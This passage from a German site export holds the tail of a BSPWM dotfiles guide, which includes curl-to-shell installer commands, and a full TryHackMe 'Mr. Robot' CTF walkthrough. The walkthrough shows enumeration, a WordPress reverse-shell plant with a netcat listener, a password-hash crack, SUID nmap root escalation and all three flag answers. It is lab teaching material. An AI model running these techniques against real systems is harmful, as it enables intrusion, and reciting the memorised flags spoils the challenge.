libxcb-randr0-dev libxcb-composite0-dev python3-xcbgen xcb-proto libxcb-image0-dev libxcb-ewmh-dev libxcb-icccm4-dev libxcb-xkb-dev libxcb-xrm-dev libxcb-cursor-dev libasound2-dev libpulse-dev libjsoncpp-dev libmpdclient-dev libcurl4-openssl-dev libnl-genl-3-dev Repository-Klonen: cd ~/Downloads git clone --recursive https://github.com/polybar/polybar Zusammenstellung und Installation von polybar: cd polybar mkdir build cd build cmake .. make -j$(nproc) sudo make install Installation von Picom # Installation der erforderlichen Abhängigkeiten: sudo apt install meson libxext-dev libxcb1-dev libxcb-damage0-dev libxcb-xfixes0-dev libxcb-shape0-dev libxcb-render-util0-dev libxcb-render0-dev libxcb-randr0-dev libxcb-composite0-dev libxcb-image0-dev libxcb-present-dev libxcb-xinerama0-dev libpixman-1-dev libdbus-1-dev libconfig-dev libgl1-mesa-dev libpcre2-dev libevdev-dev uthash-dev libev-dev libx11-xcb-dev Repository-Klonen: cd ~/Downloads git clone https://github.com/ibhagwan/picom.git Picom mit Ninja machen: cd picom git submodule update --init --recursive meson --buildtype=release . build ninja -C build Installation von Picom Compositor: sudo ninja -C build install cd .. Installation von Rofi # sudo apt install rofi Installation des Alacritty-Terminals # sudo apt install alacritty Klonen dieses Repositorys: cd ~/Downloads git clone https://github.com/lukapiplica/dots.git Einrichten eines Alacritty-Themes: mkdir ~/.config/alacritty cp dots/alacritty/alacritty.yml ~/.config/alacritty/ HINWEIS: Wenn Sie die Fehlermeldung GLSL 3.30 wird nicht unterstützt erhalten, gehen Sie wie folgt vor: nano /usr/share/applications/com.alacritty.Alacritty.desktop Ändern Sie Exec=alacritty in Exec=bash -c \u0026quot;LIBGL_ALWAYS_SOFTWARE=1 alacritty\u0026quot;.\nHINWEIS: Nach diesem Schritt können Sie sich bei BSPWM anmelden; zuerst müssen Sie sich von der aktuellen Desktop-Oberfläche abmelden; Klicken Sie dann auf das Symbol ⚙️ in der unteren rechten Ecke und wählen Sie BSPWM aus. Installation von Schriftarten # cd ~/Downloads cd dots sudo cp -r Source_Code_Pro /usr/share/fonts fc-cache -v Einstellen des Hintergrundbilds # Installation des Feh: sudo apt install feh Bewegliche Hintergrundbilder: mkdir ~/Wall cp -r ~/Downloads/dots/Wallpapers/ ~/Wall Hintergrundbild einstellen: echo \u0026#39;feh --bg-fill $HOME/Downloads/dots/Wallpapers/wallpaper2.jpeg\u0026#39; \u0026gt;\u0026gt; ~/.config/bspwm/bspwmrc Konfiguration von Polybar # mkdir ~/.config/polybar cd ~/Downloads/dots/polybar cp * -r ~/.config/polybar echo \u0026#39;~/.config/polybar/./launch.sh\u0026#39; \u0026gt;\u0026gt; ~/.config/bspwm/bspwmrc cd fonts sudo cp * /usr/share/fonts/truetype/ Installation von Oh-My-ZSH # sudo apt install zsh sh -c \u0026#34;$(curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh) Installation von Powerlevel10k # Repository-Klonen: git clone --depth=1 https://github.com/romkatv/powerlevel10k.git ${ZSH_CUSTOM:-$HOME/.oh-my-zsh/custom}/themes/powerlevel10k Nach dem Klonen müssen wir dieses Thema in der ~/.zshrc-Datei setzen; Wir tun dies, indem wir die .zshrc-Datei mit diesem Befehl ZSH_THEME=\u0026quot;powerlevel10k/powerlevel10k\u0026quot; eingeben\nWir geben im Terminal ein:\np10k configure Folgen wir den Anweisungen im Terminal, um das gewünschte Thema zu erstellen.\nInstallation des Vim Thema # mkdir -p ~/.vim/colors cd ~/Downloads cp dots/nord.vim ~/.vim/colors Klonen eines Vim Airline Thema: cd ~/Downloads git clone https://github.com/vim-airline/vim-airline.git cd vim-airline cp * -r ~/.vim echo \u0026#39;colorscheme nord\u0026#39; \u0026gt;\u0026gt; ~/.vimrc echo \u0026#39;let g:airline_theme=\u0026#39;base16\u0026#39;\u0026#39; \u0026gt;\u0026gt; ~/.vimrc Rofi-Theme einrichten # mkdir -p ~/.config/rofi/themes cp ~/Downloads/dots/nord.rasi ~/.config/rofi/themes rofi-theme-selector Rofi Theme Selector zeigt uns einige der Themen. Um unser Design auszuwählen, gehen Sie zu Nord theme, klicken Sie auf Enter, und drücken Sie dann Alt + a, um es für immer festzulegen. nano ~/.config/sxhkd/sxhkdrc Öffnet den Nano-Texteditor im Terminal und wir müssen dmenu in rofi -show drun ändern. Installation von Slim und Slimlock # sudo apt instll slim libpam0g-dev libxrandr-dev libfreetype6-dev libimlib2-dev libxft-dev sudo dpkg-reconfigure gdm3 Hinweis: Wenn wir ein Menü erhalten, müssen wir Slim als Option auswählen. So stellen Sie das Thema ein: cd ~/Downloads/dots sudo cp slim.conf /etc \u0026amp;\u0026amp; sudo cp slimlock.conf /etc sudo cp default /usr/share/slim/themes Verschiedene Werkzeuge # Wir haben das Aussehen dieses Betriebssystems erfolgreich erreicht; Jetzt installieren wir mehrere Programme aus den Bildern.\nInstallation von tty-clock # sudo apt-get install tty-clock Installation von CAVA Audio Visualizer # sudo add-apt-repository ppa:hsheth2/ppa sudo apt-get update sudo apt-get install cava Installation von htop # sudo apt-get install htop Installation von cmatrix # sudo apt-get install cmatrix Installation von sxiv # sudo apt-get install sxiv Installation von Ranger # sudo apt-get install ranger Installation von pfetch # cd ~/Downloads git clone https://github.com/dylanaraps/pfetch.git sudo install pfetch/pfetch /usr/local/bin/ ls -l /usr/local/bin/pfetch Installation von chafa # cd ~/Downloads git clone https://github.com/hpjansson/chafa.git cd chafa ./autogen.sh make sudo make install Installation des Schlangenspiels # sudo apt install python3-pip python3 -m pip install -U pygame --user cd ~/Downloads git clone https://github.com/Unixado/Snake.git cd Snake python src/game.py Lollypop installieren # sudo add-apt-repository ppa:gnumdk/lollypop sudo apt install lollypop Installation von Minimal Functional Fox # sh -c \u0026#34;$(curl -fsSL https://raw.githubusercontent.com/mut-ex/minimal-functional-fox/master/install.sh)\u0026#34; Richten Sie ein Firefox-Design ein cp -r ~/Downloads/dots/.firefoxthemes ~/ Öffnen Sie dann Firefox und gehen Sie zu Einstellungen, dann zu Home und wo es heißt Homepage und neue Fenster wählen wir Benutzerdefinierte URLs ..., unten schreiben wir dies: file:///home/*YOUR USERNAME*/.firefoxthemes/startpage/Startpage/index.html Starten Sie Firefox neu Installation des GTK Thema # Installation von Lxappearance # sudo apt-get install lxappearance Installation des Themas Nordic Dark # Themenlink: https://www.gnome-look.org/p/1267246/ Laden Sie die ZIP-Datei herunter, entpacken Sie sie und fügen Sie sie in Lxappearance ein.\nInstallation des Flattery Dark Thema für Icons # Themenlink: https://www.gnome-look.org/s/Gnome/p/1332404 Laden Sie die ZIP-Datei herunter, entpacken Sie sie und fügen Sie sie in Lxappearance ein.\nInstallation des Oreo Blue-Cursor-Thema # Themenlink: https://www.gnome-look.org/s/Gnome/p/1360254/ Laden Sie die ZIP-Datei herunter, entpacken Sie sie und fügen Sie sie in Lxappearance ein.\nWikipedia # Nachdem wir diese BSPWM-Konfiguration vorgenommen haben, ist es an der Zeit zu klären, was jede Anwendung tut. Innerhalb des Verzeichnisses ~/.config/ finden Sie alle Dateien, die Sie zum Ausführen von BSPWM benötigen.\n🧠 [BSPWM]\nBSPWM ist ein Tiling Window Manager, der im Gegensatz zu anderen Desktop-Oberflächen jedes neue Fenster nach einem Algorithmus öffnet.\nWenn wir beispielsweise zwei Fenster haben, werden sie im Vollbildmodus geöffnet und können nicht übereinander angeordnet werden, wie z. B. in Windows- oder GNOME-Oberflächen. Theoretisch wird der Platz auf dem Bildschirm effektiv genutzt, sodass der gesamte Bildschirm ausgefüllt wird. Wenn uns auf dem ersten Desktop der Platz ausgeht, können wir per Tastaturkürzel oder Maus auf den zweiten Desktop wechseln und dieses Betriebssystem weiter verwenden.\n⌨️ [SXHKD]\nSXHKD ist ein Tastatur-Daemon. Es funktioniert für uns als Hintergrundprozess und teilt BSPWM mit, welche Anwendung geöffnet werden soll, wenn der Benutzer eine bestimmte Tastenkombination auf der Tastatur drückt.\n🍫 [Polybar]\nPolybar ist unsere Statusleiste oben auf unserem Desktop.\nEs dient uns zur Anzeige von Benachrichtigungen, Datum und Uhrzeit, Internet, Akku, Shutdown- und Restart-Menü des Betriebssystems und der wichtigsten Workspaces von BSPWM.\n📚 [Picom]\nPicom ist ein Compositor; Es dient uns als Prozess, der jeder Anwendung, die wir öffnen, abgerundete Kanten verleiht.\n🤓 [Rofi]\nRofi ist ein Prozess, der andere Anwendungen öffnet, am hilfreichsten beim Ausführen von GTK-Anwendungen (Benutzeroberflächenanwendungen).\n💻 [Alacritty] Terminal.\nAlacritty dient als Terminal-Emulator, also als Ersatz für das Standard-GNOME-Terminal.\nWir verwenden es hauptsächlich, weil es uns die Möglichkeit gibt, durch Bearbeiten seiner Konfigurationsdateien ein besseres Aussehen zu erzielen.\n🐚 [Oh-My-ZSH] shell.\nOh-My-ZSH ist ein Framework, das uns die Verwaltung von ZSH-Konfigurationen erleichtert.\nIn diesem Fall wird es hauptsächlich verwendet, um Themen zu einem Terminal hinzuzufügen, das eine ZSH-Shell hat.\nZSH (Zshell) wurde ausgewählt, weil es neuer ist und die meisten Updates von anderen Linux-Distributionen im Vergleich zu Bash Shell bereits darauf verschoben werden.\nWir haben die Powerlevel10k-Konfiguration verwendet, um die Themen festzulegen. 📋 [Vim] Texteditor\nDa viele Leute Notepad auf Windows-Betriebssystemen verwenden, verwenden wir Nano und Vim.\nDer Nano-Texteditor ist viel einfacher zu bedienen, während der Vim aufgrund seiner Verknüpfungen eher für Entwickler gemacht ist.\nVim Airline ist ein Thema, das uns ein anderes Aussehen verleiht als ein normaler Vim. 📺 [Slim] Sperrbildschirm\nSlim ist unser Sperrbildschirm.\nSlimlock ist das Thema, das wir für den Sperrbildschirm verwendet haben.\n💬 [Dunst] Benachrichtigungen\nDunst ist ein Prozess, der im Hintergrund ausgeführt wird und dessen Hauptzweck darin besteht, Benachrichtigungen in der Statusleiste (Polybar) anzuzeigen.\nDer Vorteil von Dunst ist, dass es die Möglichkeit bietet, Themen für das Aussehen und viele andere Funktionen wie z. Welche Benachrichtigungen angezeigt werden sollen usw.\n🕶️ [Nordic Dark] GTK Thema.\nNordic Dark ist ein GTK-Design (Design für Benutzeroberflächenanwendungen), das uns einen dunklen Blick auf Anwendungen mit einer Benutzeroberfläche gibt.\n🔷 [Flattery Dark] Icon Thema.\nDer Name sagt schon, dass Anwendungen mit einer Benutzeroberfläche meistens Symbole haben, die wir mit der Maus anklicken können; Dieses Thema gibt uns ein anderes Aussehen der Symbole.\n🔵 [Oreo Blue] Cursor-Thema.\nDieses Thema gibt uns einen blauen Cursor-Look, es wurde nur wegen des Aussehens eingefügt und weil es zu allen anderen Farben dieses Betriebssystems passt.\n🔤 [Source Code Pro] Schriftart.\nSchriftart dieses Betriebssystems.\n🔥🦊 [Firefox] Webbrowser.\nIch verwende Firefox, weil es meiner Meinung nach einer der besten datenschutzorientierten Webbrowser ist.\n🦊 [Minimal Functional Fox] Firefox-Thema.\nDieses Thema dient hier hauptsächlich dem Aussehen, aber auch, weil es minimal ist.\n⏰ tty-clock\nTty-clock ist eine Anwendung, die den Zweck hat, die Uhrzeit und das Datum im Terminal anzuzeigen.\n🎚️ CAVA Audio-Visualisierer.\nCava ist unsere Anwendung, die als Audiovisualisierer dient.\n📈 HTop\nDie HTop-Anwendung zeigt, welche Prozessoren gerade laufen und wie viel RAM sie belegen, und viele andere Dinge. Stellen Sie sich HTop als Task-Manager im Windows-Betriebssystem vor.\n😎 CMatrix\nCMatrix ist eine Anwendung, die nur zum Anschauen da ist, und ihr Zweck ist es, Text in einem offenen Terminal zu drucken, der darauf abzielt, eine Anzeige von Hacking aus dem Matrix-Film zu geben.\n🖼️ SXIV\nSXIV ist eine Bildbetrachteranwendung, die Bilder für uns öffnet.\n🤠 Ranger\nRanger ist eine Anwendung, mit der wir alle Dateien auf dem Computer im Terminal sehen und darauf zugreifen können.\n🗄️ Pfetch\nDer Zweck der Pfetch-Anwendung besteht darin, anzuzeigen, welches Betriebssystem wir verwenden, welchen Laptop/Computer wir haben, welche Version des Kernels aktuell ist, wie viel Betriebszeit wir derzeit haben, wie viele Pakete wir haben und wie viel RAM wir haben.\n⚙️ Chafa\nChafa ist eine Anwendung, die ein Bild zur Verwendung im Terminal druckt und so ein Retro/ASCII-Aussehen eines Bildes erzielt.\n🐍 Snake\nIn diesem Fall handelt es sich bei der Snake-App um ein altes Snake-Spiel aus dem Nokia 3310-Handy, das farblich leicht modifiziert und für das Spielen im Terminal angepasst wurde.\n🍭 Lollypop\nLollypop ist eine Musik-App, wir spielen Songs darüber.\nAbkürzungen # Als super verwenden wir die Windows-Taste auf der Tastatur. Super ist die wichtigste Taste auf unserer Tastatur, weil wir damit dem SXHKD-Tastatur-Daemon Anweisungen geben.\nKeyboard # Schlüssel Aktion super + enter Öffnet Terminal super + space Öffnet Rofi, über das wir GTK-Anwendungen öffnen super + escape Lädt SXHKD und seine Konfigurationsdateien neu super + alt + r Startet den BSPWM Tiling Window Manager neu super + w Beendet die aktuelle Anwendung super + [1-0] Ändert den aktuellen Arbeitsbereich super + g Es ändert das aktuelle kleinere Fenster auf die Fläche des größeren Fensters, während das größere Fenster es in die Position des kleineren versetzt super + m Öffnet die Anwendung über den gesamten Desktop super + [h,j,k,l] Verschiebt den Fokus auf ein anderes Fenster super + alt + [h,j,k,l] Bewegt die Fenster nach außen super + alt + shift + [h,j,k,l] Bewegt die Fenster nach innen super + s Versetzt Fenster in den sogenannten Float-Modus, eine Option, bei der wir wie in Windows-Betriebssystemen ein Fenster auf das Fenster legen können super + ctrl + [Pfeiltasten] Verschiebt die schwebenden Fenster Vielen Dank für Ihre Zeit 💙 # ","date":"19 Juli 2021","permalink":"/de/blog/pop-os-nordic/","section":"Blogs","summary":"🖥️ Pop! Linux-Konfigurationsdateien 🖥️ Hinweis: Diese Seite wurde mit Hilfe von DeepL und Google Translate ins Deutsche übersetzt. Dies sind meine aktuellen Dotfiles von Pop! Betriebssystem der Linux-Distribution.\nDie Installation hilft Ihnen dabei, das gleiche Aussehen wie auf den Bildern zu erzielen.","title":"[BSPWM] Pop OS Nordic"},{"content":" 🤖 TryHackMe Mr. Robot CTF 🤖 Hinweis: Diese Seite wurde mit Hilfe von DeepL und Google Translate ins Deutsche übersetzt. Können wir Mr. Robot CTF hacken? Diese virtuelle Maschine ist mit mittel bewertet und wird uns viele nützliche Dinge beibringen.\nDie Anweisungen helfen dabei, dieselben Antworten zu erhalten; es gibt Schritt-für-Schritt-Anleitungen.\nVerwendete Programme:\nOpenVPN NMAP GoBuster Netcat Anweisungen # Um mit dem Hacken dieser virtuellen Maschine zu beginnen, müssen wir uns zuerst mit TryHackMe OpenVPN verbinden und die Maschine in Aufgabe 2 ausführen.\nIch gehe davon aus, dass Ihre lokale virtuelle Maschine das Betriebssystem Kali Linux verwendet.\nVerbindungsaufbau über OpenVPN # Zuerst müssen wir die Datei OpenVPN von TryHackMe herunterladen, die sie Ihnen geben. Schalten Sie dann das Terminal in dem Verzeichnis ein, in das Sie die OpenVPN-Datei heruntergeladen haben. Der Anschluss erfolgt über:\nsudo openvpn *NAME_OF_YOUR_FILE*.ovpn Netzwerkaufzählung # Zuerst müssen wir uns ansehen, welche Ports offen sind. Je mehr wir über das System wissen, desto besser. In diesem Fall verwenden wir Nmap, um das Netzwerk zu scannen.\nNmap-Scan # kali@kali:~/Desktop$ nmap *IP_ADRESSE* -A Ergebnis des Nmap-Scans # kali@kali:-/Desktop$ nmap 10.10.51.194 -A Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-23 18:35 CEST Nmap scan report for 10.10.38.44 Host is up (0.095s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp closed ssh 80/tcp open http Apache httpd |_http-server-header: Apache |_http-title: Site doesn\u0026#39;t have a title (text/html). 443/tcp open ssl/http Apache httpd |_http-server-header: Apache |_http-title: Site doesn\u0026#39;t have a title (text/html). | ssl-cert: Subject: commonName=www.example.com | Not valid before: 2015-09-16T10:45:03 |_Not valid after: 2025-09-13T10:45:03 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 34.90 seconds Wie wir sehen können, haben wir Port 80 geöffnet, was uns sagt, dass dies eine Website im HTTP-Protokoll ist.\nInstallation von seclists # sudo apt install seclists Nach diesem Befehl wird seclists im Verzeichnis /usr/share/seclists/ installiert.\nVerzeichnisaufzählung auf einem Webserver mit gobuster # kali@kali:~/Desktop$ gobuster dir -u http://10.10.51.194/ -w /usr/share/seclists/Discovery/Web-Content/common.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) \u0026amp; Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.51.194/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2021/05/23 18:27:45 Starting gobuster in directory enumeration mode =============================================================== /.hta (Status: 403) [Size: 213] /.htaccess (Status: 403) [Size: 218] /.htpasswd (Status: 403) [Size: 218] /0 (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/0/] /Image (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/Image/] /admin (Status: 301) [Size: 234] [--\u0026gt; http://10.10.51.194/admin/] /atom (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/feed/atom/] /audio (Status: 301) [Size: 234] [--\u0026gt; http://10.10.51.194/audio/] /blog (Status: 301) [Size: 233] [--\u0026gt; http://10.10.51.194/blog/] /css (Status: 301) [Size: 232] [--\u0026gt; http://10.10.51.194/css/] /dashboard (Status: 302) [Size: 0] [--\u0026gt; http://10.10.51.194/wp-admin/] /favicon.ico (Status: 200) [Size: 0] /feed (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/feed/] /images (Status: 301) [Size: 235] [--\u0026gt; http://10.10.51.194/images/] /image (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/image/] /index.php (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/] /index.html (Status: 200) [Size: 1188] /js (Status: 301) [Size: 231] [--\u0026gt; http://10.10.51.194/js/] /intro (Status: 200) [Size: 516314] /license (Status: 200) [Size: 309] /login (Status: 302) [Size: 0] [--\u0026gt; http://10.10.51.194/wp-login.php] /page1 (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/] /phpmyadmin (Status: 403) [Size: 94] /readme (Status: 200) [Size: 64] /rdf (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/feed/rdf/] /robots (Status: 200) [Size: 41] /robots.txt (Status: 200) [Size: 41] /rss (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/feed/] /rss2 (Status: 301) [Size: 0] [--\u0026gt; http://10.10.51.194/feed/] /sitemap (Status: 200) [Size: 0] /sitemap.xml (Status: 200) [Size: 0] /video (Status: 301) [Size: 234] [--\u0026gt; http://10.10.51.194/video/] /wp-admin (Status: 301) [Size: 237] [--\u0026gt; http://10.10.51.194/wp-admin/] /wp-content (Status: 301) [Size: 239] [--\u0026gt; http://10.10.51.194/wp-content/] /wp-config (Status: 200) [Size: 0] /wp-includes (Status: 301) [Size: 240] [--\u0026gt; http://10.10.51.194/wp-includes/] /wp-cron (Status: 200) [Size: 0] /wp-links-opml (Status: 200) [Size: 227] /wp-load (Status: 200) [Size: 0] /wp-login (Status: 200) [Size: 2606] /wp-mail (Status: 500) [Size: 3064] /wp-settings (Status: 500) [Size: 0] /wp-signup (Status: 302) [Size: 0] [--\u0026gt; http://10.10.51.194/wp-login.php?action=register] /xmlrpc (Status: 405) [Size:42] =============================================================== 2021/05/23 18:40:33 Finished =============================================================== Suche nach dem ersten Schlüssel # Nach der Aufzählung können wir weitere Verzeichnisse sehen, die sich auf diesem Webserver befinden. Wenn wir uns den TryHackMe-Hinweis für den ersten Schlüssel ansehen, können wir sehen, dass unser Hinweis robots.txt ist. Ich denke, dieser Hinweis /robots Verzeichnis sind verwandt. Daneben interessiere ich mich für /wp-login; Ich denke, es ist WordPress.\nAufruf der Seite Geben Sie die erhaltene IP-Adresse in Ihren Webbrowser ein:\nAber wenn wir unseren Link /robots.txt (IP_ADDRESS/robots.txt) eingeben, können wir sehen, dass er den ersten Schlüssel auswirft, der im .txt-Format vorliegt.\nWir haben zwei Dateien gefunden, eine fsociety.dic und key-1-of-3.txt. Die erste Datei sieht aus wie eine Wörterbuchdatei.\nHerunterladen des ersten Schlüssels # Wir können den ersten Schlüssel sehen, indem wir die Seite eingeben (http://IP_ADRESSE/key-1-of-3.txt), aber wir können ihn auch mit dem Befehl curl herunterladen.\ncurl -s http://IP_ADRESSE/key-1-of-3.txt Ergebnis # kali@kali:~/Desktop$ curl -s http://10.10.51.194/key-1-of-3.txt 073403c8a58a1f80d943455fb30724b9 Erster Schlüssel: 073403c8a58a1f80d943455fb30724b9\nFinden des zweiten Schlüssels # HINWEIS: Weißer Text.\nWenn wir zurück zu gobuster gehen, können wir sehen, dass wir WordPress-Verzeichnisse hatten. Ich interessiere mich speziell für:\n/login (Status: 302) /wp-content (Status: 301) /admin (Status: 301) /wp-login (Status: 200) /license (Status: 200) /wp-includes (Status: 301) Wie wir sehen können, hat das Verzeichnis /license den Status 200. Status 200 sagt uns, dass die Seite aktiv ist. Curl ist in diesem Fall unser bester Freund.\nCurl-Befehl # curl -s http://IP_ADDRESS/license | tr -d \u0026#34;\\n\u0026#34; Ergebnis # kali@kali:~/Desktop$ curl -s http://10.10.51.194/license | tr -d \u0026#34;\\n\u0026#34; what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?do you want a password or something? ZWxsaW90OkVSMjgtMDY1Mgo= Der spezifische Text ist ZWxsaW90OkVSMjgtMDY1Mgo= sieht aus wie base64.\nBase64 entschlüsseln # Der Befehl, den wir verwenden werden, lautet:\necho \u0026#34;ZWxsaW90OkVSMjgtMDY1Mgo=\u0026#34; | base64 -d Ergebnis der Base64-Entschlüsselung # kali@kali:~/Desktop$ echo \u0026#34;ZWxsaW90OkVSMjgtMDY1Mgo=\u0026#34; | base64 -d elliot:ER28-0652 Wir haben den Benutzernamen und das Passwort, denke ich, von WordPress.\n**Interessante Tatsache: ** Der Code ist ein Verweis auf Elliots Nummer aus dem Personalausweis bei der Arbeit und taucht in der Serie auf. WordPress-Aufzählung # Es ist an der Zeit, sich bei WordPress anzumelden:\nDer erste Schritt ist zu gehen:\nhttp://IP_ADDRESS/wp-login Nachdem wir uns sofort auf der Seite in der unteren linken Ecke angemeldet haben, sehen wir, dass die WordPress-Version 4.3.1 ist. Dies ist eine alte Version von WordPress.\nWir finden zwei Benutzer, von denen Elliot (wir) der Administrator ist.\nWir können sehen, dass diese alte Version von WordPress anfällig für PHP Reverse Shell, LINK DES SKRIPTS Da wir ein Administrator sind, müssen wir zum Aussehen gehen.\nWir müssen den Code durch das Skript auf der 404-PHP-Vorlage ersetzen.\nHinweis: Achten Sie auf die IP-Adresse im Code; hier haben wir die lokale IP-Adresse, dh. Die IP-Adresse unseres Computers. Wir können die lokale IP-Adresse mit ifconfig überprüfen. PHP reverse shell über netcat # Nachdem wir die IP-Adresse im Skript ersetzt und geändert haben, führen wir Netcat auf dem Port aus, der über das Skript eine Verbindung zu uns herstellt. Das machen wir mit folgendem Befehl:\nnc -nlvp 1234 Danach müssen wir im Webbrowser auf die http://IP_ADRESSE/404.php diesen Link gehen.\nWie wir sehen können, haben wir die Shell im Terminal geöffnet. Netcat bekam die Verbindung.\nWir werden nun prüfen, welche Dateien sich im Verzeichnis /home/robot befinden. Das machen wir mit dem Befehl:\nls -l /home/robot Wir kennen jetzt die Position des zweiten Schlüssels:\n$ ls -l /home/robot total 8 -r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt -rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5 Das Problem ist, dass wir überhaupt kein \u0026ldquo;Roboter\u0026rdquo;-Benutzer auf dieser Maschine sind. Wir überprüfen dies mit dem whoami-Befehl.\n$ whoami daemon Die einzige Datei, die wir sehen können, ist password.raw-md5. Mal sehen, was in dieser Datei ist.\n$ cat /home/robot/password.raw-md5 robot:c3fcd3d76192e4007dfb496cca67e13b MD5-Hash entschlüsseln # Es ist MD5-Hash. Ein Hash ist eine mathematische Funktion, die nicht zurückgegeben werden kann, nachdem sie ihre Aufgabe erledigt hat. Dies ist gut zum Speichern von Passwörtern, aber MD5 ist ein alter Algorithmus und leicht zu knacken.\nWir werden zunächst prüfen, ob dieser Hash online geknackt werden kann, um Zeit zu sparen. Verknüpfung Wie wir auf dem obigen Link sehen können, ist dies möglich. Das Passwort ist abcdefghijklmnopqrstuvwxyz\nJetzt müssen wir uns als robot-Benutzer anmelden. Das machen wir mit folgendem Befehl:\nsu - robot Aber es gibt ein Problem:\n$ su - robot su: must be run from a terminal Python Shell # Dies kann mit Python behoben werden. Zuerst müssen wir prüfen, ob Python überhaupt installiert ist.\n$ which python /usr/bin/python Lassen Sie uns eine Shell mit Python erstellen. Das können wir mit diesem Befehl machen:\npython -c \u0026#39;import pty; pty.spawn(\u0026#34;/bin/sh\u0026#34;)\u0026#39; Wie Sie sehen können, hat das Terminal keine Fehler angezeigt, was bedeutet, dass wir erfolgreich eine Shell in Python erstellt haben.\nMelden wir uns als Benutzer robot an.\n$ su - robot su - robot Password: abcdefghijklmnopqrstuvwxyz $ whoami whoami robot $ Wie wir sehen können, sind wir als robot-Benutzer angemeldet.\nZweiter Schlüssel # Um den zweiten Schlüssel anzuzeigen, müssen wir den cat-Befehl verwenden:\ncat key-2-of-3.txt Ergebnis:\n$ cat key-2-of-3.txt cat key-2-of-3.txt 822c73956184f694993bede3eb39f959 Zweiter Schlüssel: 822c73956184f694993bede3eb39f959\nFinden des dritten Schlüssels # HINWEIS: NMAP\nWenn wir zurück zum Nmap-Ergebnis gehen, das wir am Anfang erhalten haben; Wir können sehen, dass der SSH-Port geschlossen ist. Der endgültige Schlüssel befindet sich meistens im /root-Verzeichnis. Um root zu werden, müssen wir eine Privilegieneskalation durchführen. Als erstes interessiert mich, ob der Benutzer robot in der sogenannten sudo-Gruppe ist.\nPrivilegieneskalation # Ist der Benutzer robot in der sudo-Gruppe?\n$ sudo -l sudo -l [sudo] password for robot: abcdefghijklmnopqrstuvwxyz Sorry, user robot may not run sudo on linux. Der Benutzer robot ist nicht auf der Liste mit sudo-Berechtigungen. Jetzt können wir sehen, welche Programme sich unter dem Benutzer root befinden.\nÜberprüfen von SETUID, die unter Root-Kontrolle stehen: # Befehl:\nfind / -user root -perm -4000 -print 2\u0026gt;/dev/null Ausgabe:\n$ find / -user root -perm -4000 -print 2\u0026gt;/dev/null / -user root -perm -4000 -print 2\u0026gt;/dev/null /bin/ping /bin/umount /bin/mount /bin/ping6 /bin/su /usr/bin/passwd /usr/bin/newgrp /usr/bin/chsh /usr/bin/chfn /usr/bin/gpasswd /usr/bin/sudo /usr/local/bin/nmap /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper /usr/lib/pt_chown Mir ist sofort /usr/local/bin/nmap aufgefallen. Mal sehen, welche Version von Nmap es ist.\nÜberprüfung der Nmap-Version: # Befehl:\nnmap --version Ausgabe:\n$ nmap --version nmap --version nmap version 3.81 ( http://www.insecure.org/nmap/ ) Wie wir sehen können, ist die Nmap-Version 3.81.\nAufzählung: # Nach ein wenig Recherche fand ich heraus:\nVerknüpfung Wie wir unter dem obigen Link lesen können, handelt es sich um eine ältere Nmap-Version. Versionen von 2.02 bis 5.21 hatten die sog. Der interaktive Modus ermöglichte es uns, Befehle auszuführen. Darüber hinaus ermöglicht uns die Überprüfung von SETUID, Befehle als root auszuführen.\n$ ls -l /usr/local/bin/nmap ls -l /usr/local/bin/nmap -rwsr-xr-x 1 root root 504736 Nov 13 2015 /usr/local/bin/nmap Nmap im interaktiven Modus starten: # Befehl:\nnmap --interactive Ausgabe:\n$ nmap --interactive nmap --interactive Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ ) Welcome to Interactive Mode -- press h \u0026lt;enter\u0026gt; for help nmap\u0026gt; !whoami !whoami root waiting to reap child : No child processes Wir sehen, dass sich Nmap im interaktiven Root-Modus befindet.\nSuche nach dem letzten Schlüssel: # Wir werden zuerst prüfen, ob sich das dritte Flag in der Wurzel befindet.\nBefehl:\n!ls /root Ausgabe:\nnmap\u0026gt; !ls /root !ls /root firstboot_done key-3-of-3.txt waiting to reap child : No child processes Wir haben den dritten Schlüssel gefunden, der sich in der Textdatei befindet. Wir können den Inhalt mit dem folgenden Befehl lesen:\n!cat /root/key-3-of-3.txt nmap\u0026gt; !cat /root/key-3-of-3.txt !cat /root/key-3-of-3.txt 04787ddef27c3dee1ee161b21670b4e4 waiting to reap child : No child processes Dritter Schlüssel: 04787ddef27c3dee1ee161b21670b4e4\nFazit # Interessantes CTF mit vielen Anspielungen auf die Serie. Ich habe viel gelernt, und das Wichtigste ist, Betriebssysteme und Anwendungen regelmäßig zu aktualisieren, wie wir im Beispiel mit der älteren Version von Nmap und WordPress sehen. Erlauben Sie außerdem niemandem, Ihre Konten zu hacken, ändern Sie die Codes regelmäßig und verwenden Sie für jedes Konto Zufallscodes mit einer Mindestlänge von 32 Ziffern. Jeder sollte einem Passwort, einem Konto und einer E-Mail-Adresse folgen.\nSchlüssel # Liste der Fragen und Antworten:\nFragen Antworten Was ist Schlüssel 1? 073403c8a58a1f80d943455fb30724b9 Was ist Schlüssel 2? 822c73956184f694993bede3eb39f959 Was ist Schlüssel 3? 04787ddef27c3dee1ee161b21670b4e4 